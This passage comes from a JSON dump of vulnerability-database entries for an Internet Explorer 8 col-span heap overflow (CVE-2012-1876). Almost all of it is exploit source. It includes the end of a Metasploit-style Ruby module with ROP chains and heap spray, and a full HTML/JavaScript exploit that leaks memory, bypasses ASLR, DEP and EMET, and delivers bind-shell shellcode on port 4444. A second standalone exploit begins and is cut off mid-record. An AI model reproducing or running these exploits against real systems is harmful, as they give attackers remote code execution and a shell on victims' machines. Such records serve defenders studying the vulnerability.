ROP',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Rop' => :msvcrt\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'IE 8 on Windows 7 SP1',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Rop' => :jre\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Jun 12 2012',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef get_target(agent)\r\n\t\t#If the user is already specified by the user, we'll just use that\r\n\t\treturn target if target.name != 'Automatic'\r\n\r\n\t\tif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8/\r\n\t\t\treturn targets[1] #IE 8 on Windows XP SP3\r\n\t\telsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 8/\r\n\t\t\treturn targets[2] #IE 8 on Windows 7 with JRE\r\n\t\telse\r\n\t\t\treturn nil\r\n\t\tend\r\n\tend\r\n\r\n\tdef junk(n=4)\r\n\t\treturn rand_text_alpha(n).unpack("V").first\r\n\tend\r\n\r\n\tdef nop\r\n\t\treturn make_nops(4).unpack("V").first\r\n\tend\r\n\r\n\tdef get_payload(t)\r\n\r\n\t\tcode = payload.encoded\r\n\r\n\t\t# Both ROP chains generated by mona.py - See corelan.be\r\n\t\tcase t['Rop']\r\n\t\t\twhen :msvcrt\r\n\t\t\t\tprint_status("Using msvcrt ROP")\r\n\t\t\t\texec_size = code.length\r\n\t\t\t\trop =\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t0x77c4ec01, # retn\r\n\t\t\t\t\t\t0x77c4ec00, # pop ebp; retn\r\n\t\t\t\t\t\t0x77c15ed5, # xchg eax,esp; retn (pivot)\r\n\t\t\t\t\t\t0x77c4e392, # pop eax; retn\r\n\t\t\t\t\t\t0x77c11120, # <- *&VirtualProtect()\r\n\t\t\t\t\t\t0x77c2e493, # mov eax, dword ptr ds:[eax]; pop ebp; retn\r\n\t\t\t\t\t\tjunk,\r\n\t\t\t\t\t\t0x77c2dd6c,\r\n\t\t\t\t\t\t0x77c4ec00, # pop ebp; retn\r\n\t\t\t\t\t\t0x77c35459, # ptr to 'push esp; ret'\r\n\t\t\t\t\t\t0x77c47705, # pop ebx; retn\r\n\t\t\t\t\t\texec_size, # ebx\r\n\t\t\t\t\t\t0x77c3ea01, # pop ecx; retn\r\n\t\t\t\t\t\t0x77c5d000, # W pointer (lpOldProtect) (-> ecx)\r\n\t\t\t\t\t\t0x77c46100, # pop edi; retn\r\n\t\t\t\t\t\t0x77c46101, # rop nop (-> edi)\r\n\t\t\t\t\t\t0x77c4d680, # pop edx; retn\r\n\t\t\t\t\t\t0x00000040, # newProtect (0x40) (-> edx)\r\n\t\t\t\t\t\t0x77c4e392, # pop eax; retn\r\n\t\t\t\t\t\tnop, # nops (-> eax)\r\n\t\t\t\t\t\t0x77c12df9 # pushad; retn\r\n\t\t\t\t\t].pack("V*")\r\n\t\t\twhen :jre\r\n\t\t\t\tprint_status("Using JRE ROP")\r\n\t\t\t\texec_size = code.length\r\n\t\t\t\trop =\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t0x7c346c0b, # retn\r\n\t\t\t\t\t\t0x7c36f970, # pop ebp; retn\r\n\t\t\t\t\t\t0x7c348b05, # xchg eax,esp; retn (pivot)\r\n\t\t\t\t\t\t0x7c36f970, # pop ebp; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c36f970, # skip 4 bytes [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c34373a, # pop ebx ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\texec_size, # ebx\r\n\t\t\t\t\t\t0x7c3444d0, # pop edx ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x00000040, # 0x00000040-> edx\r\n\t\t\t\t\t\t0x7c361829, # pop ecx ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c38f036, # &Writable location [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c342766, # pop edi ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c346c0b, # retn (rop nop) [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c350564, # pop esi ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c3415a2, # jmp [eax] [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c3766ff, # pop eax ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c37a151, # ptr to &VirtualProtect() - 0x0ef [IAT msvcr71.dll]\r\n\t\t\t\t\t\t0x7c378c81, # pushad # add al,0ef ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c345c30 # ptr to 'push esp; ret ' [MSVCR71.dll]\r\n\t\t\t\t\t].pack("V*")\r\n\t\tend\r\n\r\n\t\tcode = rop + code\r\n\t\treturn code\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tagent = request.headers['User-Agent']\r\n\t\tmy_target = get_target(agent)\r\n\r\n\t\t# Avoid the attack if the victim doesn't have the same setup we're targeting\r\n\t\tif my_target.nil?\r\n\t\t\tprint_error("Browser not supported: #{agent}")\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tjs_code = Rex::Text.to_unescape(get_payload(my_target), Rex::Arch.endian(target.arch))\r\n\r\n\t\ttable_builder = ''\r\n\r\n\t\t0.upto(132) do |i|\r\n\t\t\ttable_builder << "<table style=\\"table-layout:fixed\\" ><col id=\\"#{i}\\" width=\\"41\\" span=\\"9\\" >&nbsp </col></table>"\r\n\t\tend\r\n\r\n\t\t# About smash_vtable():\r\n\t\t# * smash the vftable 0x07070024\r\n\t\t# * span => the amount to overwrite\r\n\t\tjs_element_id = Rex::Text.rand_text_alpha(4)\r\n\t\tspray_trigger_js = <<-JS\r\n\r\n\t\tvar dap = "EEEE";\r\n\t\twhile ( dap.length < 480 ) dap += dap;\r\n\r\n\t\tvar padding = "AAAA";\r\n\t\twhile ( padding.length < 480 ) padding += padding;\r\n\r\n\t\tvar filler = "BBBB";\r\n\t\twhile ( filler.length < 480 ) filler += filler;\r\n\r\n\t\tvar arr = new Array();\r\n\t\tvar rra = new Array();\r\n\r\n\t\tvar div_container = document.getElementById("#{js_element_id}");\r\n\t\tdiv_container.style.cssText = "display:none";\r\n\r\n\t\tfor (var i=0; i < 500; i+=2) {\r\n\t\t\trra[i] = dap.substring(0, (0x100-6)/2);\r\n\t\t\tarr[i] = padding.substring(0, (0x100-6)/2);\r\n\t\t\tarr[i+1] = filler.substring(0, (0x100-6)/2);\r\n\t\t\tvar obj = document.createElement("button");\r\n\t\t\tdiv_container.appendChild(obj);\r\n\t\t}\r\n\r\n\t\tfor (var i=200; i<500; i+=2 ) {\r\n\t\t\trra[i] = null;\r\n\t\t\tCollectGarbage();\r\n\t\t}\r\n\r\n\t\tfunction heap_spray(){\r\n\t\t\tCollectGarbage();\r\n\r\n\t\t\tvar shellcode = unescape("#{js_code}");\r\n\r\n\t\t\twhile (shellcode.length < 100000)\r\n\t\t\tshellcode = shellcode + shellcode;\r\n\t\t\tvar onemeg = shellcode.substr(0, 64*1024/2);\r\n\t\t\tfor (i=0; i<14; i++) {\r\n\t\t\t\tonemeg += shellcode.substr(0, 64*1024/2);\r\n\t\t\t}\r\n\r\n\t\t\tonemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n\t\t\tvar spray = new Array();\r\n\r\n\t\t\tfor (i=0; i<400; i++) {\r\n\t\t\t\tspray[i] = onemeg.substr(0, onemeg.length);\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tfunction smash_vtable(){\r\n\t\t\tvar obj_col_0 = document.getElementById("132");\r\n\t\t\tobj_col_0.width = "1178993";\r\n\t\t\tobj_col_0.span = "44";\r\n\t\t}\r\n\r\n\t\tsetTimeout(function(){heap_spray()}, 400);\r\n\t\tsetTimeout(function(){smash_vtable()}, 700);\r\n\t\tJS\r\n\r\n\t\tif datastore['OBFUSCATE']\r\n\t\t\tspray_trigger_js = ::Rex::Exploitation::JSObfu.new(spray_trigger_js)\r\n\t\t\tspray_trigger_js.obfuscate\r\n\t\tend\r\n\r\n\t\t# build html\r\n\t\tcontent = <<-HTML\r\n\t\t<html>\r\n\t\t<body>\r\n\t\t<div id="#{js_element_id}"></div>\r\n\t\t#{table_builder}\r\n\t\t<script language='javascript'>\r\n\t\t#{spray_trigger_js}\r\n\t\t</script>\r\n\t\t</body>\r\n\t\t</html>\r\n\t\tHTML\r\n\r\n\t\tprint_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content)\r\n\tend\r\n\r\nend\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-74062", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T13:11:44", "description": "No description provided by source.", "cvss3": {}, "published": "2014-10-10T00:00:00", "type": "seebug", "title": "Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1876"], "modified": "2014-10-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87309", "id": "SSV:87309", "sourceData": "\n \r\n \r\n<html>\r\n<body>\r\n<div id="evil"></div>\r\n<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>\r\n<script language='javascript'>\r\n \r\nfunction strtoint(str) {\r\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\r\n}\r\n \r\nvar free = "EEEE";\r\nwhile ( free.length < 500 ) free += free;\r\n \r\nvar string1 = "AAAA";\r\nwhile ( string1.length < 500 ) string1 += string1;\r\n \r\nvar string2 = "BBBB";\r\nwhile ( string2.length < 500 ) string2 += string2;\r\n \r\nvar fr = new Array();\r\nvar al = new Array();\r\nvar bl = new Array();\r\n \r\nvar div_container = document.getElementById("evil");\r\ndiv_container.style.cssText = "display:none";\r\n \r\nfor (var i=0; i < 500; i+=2) {\r\n fr[i] = free.substring(0, (0x100-6)/2);\r\n al[i] = string1.substring(0, (0x100-6)/2);\r\n bl[i] = string2.substring(0, (0x100-6)/2);\r\n var obj = document.createElement("button");\r\n div_container.appendChild(obj);\r\n}\r\n \r\nfor (var i=200; i<500; i+=2 ) {\r\n fr[i] = null;\r\n CollectGarbage();\r\n}\r\n \r\nfunction heapspray(cbuttonlayout) {\r\n CollectGarbage();\r\n var rop = cbuttonlayout + 4161; // RET\r\n var rop = rop.toString(16);\r\n var rop1 = rop.substring(4,8);\r\n var rop2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 11360; // POP EBP\r\n var rop = rop.toString(16);\r\n var rop3 = rop.substring(4,8);\r\n var rop4 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\r\n var rop = rop.toString(16);\r\n var rop5 = rop.substring(4,8);\r\n var rop6 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12377; // POP EBX\r\n var rop = rop.toString(16);\r\n var rop7 = rop.substring(4,8);\r\n var rop8 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 642768; // POP EDX\r\n var rop = rop.toString(16);\r\n var rop9 = rop.substring(4,8);\r\n var rop10 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\r\n var rop = rop.toString(16);\r\n var rop11 = rop.substring(4,8);\r\n var rop12 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 5504544; // Writable location\r\n var rop = rop.toString(16);\r\n var writable1 = rop.substring(4,8);\r\n var writable2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12462; // POP EDI\r\n var rop = rop.toString(16);\r\n var rop13 = rop.substring(4,8);\r\n var rop14 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\r\n var rop = rop.toString(16);\r\n var rop15 = rop.substring(4,8);\r\n var rop16 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 63776; // JMP EAX\r\n var rop = rop.toString(16);\r\n var jmpeax1 = rop.substring(4,8);\r\n var jmpeax2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 85751; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop17 = rop.substring(4,8);\r\n var rop18 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 4936; // VirtualProtect()\r\n var rop = rop.toString(16);\r\n var vp1 = rop.substring(4,8);\r\n var vp2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\r\n var rop = rop.toString(16);\r\n var rop19 = rop.substring(4,8);\r\n var rop20 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 234657; // PUSHAD\r\n var rop = rop.toString(16);\r\n var rop21 = rop.substring(4,8);\r\n var rop22 = rop.substring(0,4); // } RET\r\n \r\n \r\n var rop = cbuttonlayout + 408958; // PUSH ESP\r\n var rop = rop.toString(16);\r\n var rop23 = rop.substring(4,8);\r\n var rop24 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2228408; // POP ECX\r\n var rop = rop.toString(16);\r\n var rop25 = rop.substring(4,8);\r\n var rop26 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1586172; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop27 = rop.substring(4,8);\r\n var rop28 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\r\n var rop = rop.toString(16);\r\n var rop29 = rop.substring(4,8);\r\n var rop30 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1884912; // PUSH EAX\r\n var rop = rop.toString(16);\r\n var rop31 = rop.substring(4,8);\r\n var rop32 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\r\n var rop = rop.toString(16);\r\n var rop33 = rop.substring(4,8);\r\n var rop34 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\r\n var rop = rop.toString(16);\r\n var rop35 = rop.substring(4,8);\r\n var rop36 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 5036248; // ADD ESP,0C\r\n var rop = rop.toString(16);\r\n var rop37 = rop.substring(4,8);\r\n var rop38 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX\r\n var rop = rop.toString(16);\r\n var rop39 = rop.substring(4,8);\r\n var rop40 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 3660458; // MOV EDX,EAX # MOV EAX,EDX # POP ESI\r\n var rop = rop.toString(16);\r\n var rop41 = rop.substring(4,8);\r\n var rop42 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1560432; // PUSH EDX # CALL EAX\r\n var rop = rop.toString(16);\r\n var rop43 = rop.substring(4,8);\r\n var rop44 = rop.substring(0,4); // } RET\r\n \r\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\r\n var getmodulew = getmodulew.toString(16);\r\n var getmodulew1 = getmodulew.substring(4,8);\r\n var getmodulew2 = getmodulew.substring(0,4); // } RET\r\n \r\n \r\n var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING\r\n shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING\r\n shellcode+= unescape("%u4141%u4141"); // PADDING\r\n \r\n shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN\r\n shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN\r\n \r\n // EMET disable part 0x01\r\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\r\n shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN\r\n shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW Ptr\r\n shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN\r\n shellcode+= unescape("%u10c4%u076d"); // EMET_STRING_PTR (GetModuleHandle argument)\r\n shellcode+= unescape("%ua84c%u000a"); // EMET_CONFIG_STRUCT offset\r\n shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI\r\n shellcode+= unescape("%u10c0%u076d"); // MEM_ADDRESS_PTR (Store EMET base address here for later)\r\n shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX\r\n shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (Get the address of EMET_CONFIG_STRUCT)\r\n shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI\r\n shellcode+= unescape("%u104c%u076d"); // Get fake DecodePointer argument from the stack and update it with the encoded value\r\n shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX\r\n shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN\r\n shellcode+= unescape("%u10c0%u076d"); // Get EMET base address Ptr\r\n shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN\r\n shellcode+= unescape("%u80b0%u0004"); // Get DecodePointer offset from the stack\r\n shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (DecodePointer in IAT)\r\n shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI\r\n shellcode+= unescape("%u9090%u9090"); // Fake DecodePointer argument (Will be patched)\r\n shellcode+= unescape("%u10bc%u076d"); // MEM_ADDRESS_PTR (Store decoded pointer here here for later)\r\n shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX\r\n shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN\r\n shellcode+= unescape("%u0558%u0000"); // ROP Protections offset\r\n shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN\r\n shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN\r\n shellcode+= unescape("%u0000%u0000"); // NULL\r\n shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\r\n // EMET disable part 0x01 end\r\n \r\n // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP\r\n shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP\r\n shellcode+= unescape("%u1024%u0000"); // Size 0x00001024\r\n shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX\r\n shellcode+= unescape("%u0040%u0000"); // 0x00000040\r\n shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX\r\n shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location\r\n shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI\r\n shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET\r\n shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI\r\n shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2);// JMP EAX\r\n shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX\r\n shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()\r\n shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD\r\n shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP\r\n \r\n // Store various pointers here\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n shellcode+= unescape("%u9090%u14eb"); // NOPs\r\n shellcode+= unescape("%u4242%u4242"); // Decoded CONFIG structure pointer\r\n shellcode+= unescape("%u4141%u4141"); // Store BaseAddress address on the *stack*\r\n shellcode+= "EMET"; // EMET string\r\n shellcode+= unescape("%u0000%u0000"); // EMET string\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n // Store various pointers here\r\n \r\n // EMET disable part 0x02\r\n // MOV EAX,DWORD PTR DS:[076D10BCH]\r\n // MOV ESI,DWORD PTR [EAX+518H]\r\n // SUB ESP,2CCH\r\n // MOV DWORD PTR [ESP],10010H\r\n // MOV EDI,ESP\r\n // MOV ECX,2CCH\r\n // ADD EDI,4\r\n // SUB ECX,4\r\n // XOR EAX,EAX\r\n // REP STOS BYTE PTR ES:[EDI]\r\n // PUSH ESP\r\n // PUSH 0FFFFFFFEH\r\n // CALL ESI\r\n shellcode+= unescape("%ubca1%u6d10%u8b07%u18b0%u0005%u8100%uccec" +\r\n "%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9" +\r\n "%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa" +\r\n "%ufe6a%ud6ff");\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n // EMET disable part 0x02 end\r\n \r\n // Bind shellcode on 4444 :)\r\n // msf > generate -t js_le\r\n // windows/shell_bind_tcp - 342 bytes\r\n // http://www.metasploit.com\r\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\r\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\r\n // I would keep the shellcode the same size for better reliability :)\r\n \r\n shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +\r\n "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +\r\n "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +\r\n "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +\r\n "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +\r\n "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +\r\n "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +\r\n "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +\r\n "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +\r\n "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +\r\n "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +\r\n "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +\r\n "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +\r\n "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +\r\n "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +\r\n "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +\r\n "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +\r\n "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +\r\n "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +\r\n "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +\r\n "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +\r\n "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +\r\n "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +\r\n "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +\r\n "%u006a%uff53%u41d5");\r\n \r\n // Total spray should be 1000\r\n var padding = unescape("%u9090");\r\n while (padding.length < 1000)\r\n padding = padding + padding;\r\n var padding = padding.substr(0, 1000 - shellcode.length);\r\n \r\n shellcode+= padding;\r\n \r\n while (shellcode.length < 100000)\r\n shellcode = shellcode + shellcode;\r\n \r\n var onemeg = shellcode.substr(0, 64*1024/2);\r\n \r\n for (i=0; i<14; i++) {\r\n onemeg += shellcode.substr(0, 64*1024/2);\r\n }\r\n \r\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n \r\n var spray = new Array();\r\n \r\n for (i=0; i<100; i++) {\r\n spray[i] = onemeg.substr(0, onemeg.length);\r\n }\r\n}\r\n \r\nfunction leak(){\r\n var leak_col = document.getElementById("132");\r\n leak_col.width = "41";\r\n leak_col.span = "19";\r\n}\r\n \r\nfunction get_leak() {\r\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\r\n str_addr = str_addr - 1410704;\r\n var hex = str_addr.toString(16);\r\n //alert(hex);\r\n setTimeout(function(){heapspray(str_addr)}, 50);\r\n}\r\n \r\nfunction trigger_overflow(){\r\n var evil_col = document.getElementById("132");\r\n evil_col.width = "1245880";\r\n evil_col.span = "44";\r\n}\r\n \r\nsetTimeout(function(){leak()}, 400);\r\nsetTimeout(function(){get_leak()},450);\r\nsetTimeout(function(){trigger_overflow()}, 700);\r\n \r\n</script>\r\n</body>\r\n</html>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87309", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T13:21:35", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-02T00:00:00", "type": "seebug", "title": "Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.X Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1876"], "modified": "2014-07-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87111", "id": "SSV:87111", "sourceData": "\n \r\n \r\n<html>\r\n<body>\r\n<div id="evil"></div>\r\n<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>\r\n<script language='javascript'>\r\n \r\nfunction strtoint(str) {\r\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\r\n}\r\n \r\nvar free = "EEEE";\r\nwhile ( free.length < 500 ) free += free;\r\n \r\nvar string1 = "AAAA";\r\nwhile ( string1.length < 500 ) string1 += string1;\r\n \r\nvar string2 = "BBBB";\r\nwhile ( string2.length < 500 ) string2 += string2;\r\n \r\nvar fr = new Array();\r\nvar al = new Array();\r\nvar bl = new Array();\r\n \r\nvar div_container = document.getElementById("evil");\r\ndiv_container.style.cssText = "display:none";\r\n \r\nfor (var i=0; i < 500; i+=2) {\r\n fr[i] = free.substring(0, (0x100-6)/2);\r\n al[i] = string1.substring(0, (0x100-6)/2);\r\n bl[i] = string2.substring(0, (0x100-6)/2);\r\n var obj = document.createElement("button");\r\n div_container.appendChild(obj);\r\n}\r\n \r\nfor (var i=200; i<500; i+=2 ) {\r\n fr[i] = null;\r\n CollectGarbage();\r\n}\r\n \r\nfunction heapspray(cbuttonlayout) {\r\n CollectGarbage();\r\n var rop = cbuttonlayout + 4161; // RET\r\n var rop = rop.toString(16);\r\n var rop1 = rop.substring(4,8);\r\n var rop2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 11360; // POP EBP\r\n var rop = rop.toString(16);\r\n var rop3 = rop.substring(4,8);\r\n var rop4 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\r\n var rop = rop.toString(16);\r\n var rop5 = rop.substring(4,8);\r\n var rop6 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12377; // POP EBX\r\n var rop = rop.toString(16);\r\n var rop7 = rop.substring(4,8);\r\n var rop8 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 642768; // POP EDX\r\n var rop = rop.toString(16);\r\n var rop9 = rop.substring(4,8);\r\n var rop10 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\r\n var rop = rop.toString(16);\r\n var rop11 = rop.substring(4,8);\r\n var rop12 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 5504544; // Writable location\r\n var rop = rop.toString(16);\r\n var writable1 = rop.substring(4,8);\r\n var writable2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12462; // POP EDI\r\n var rop = rop.toString(16);\r\n var rop13 = rop.substring(4,8);\r\n var rop14 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\r\n var rop = rop.toString(16);\r\n var rop15 = rop.substring(4,8);\r\n var rop16 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 63776; // JMP EAX\r\n var rop = 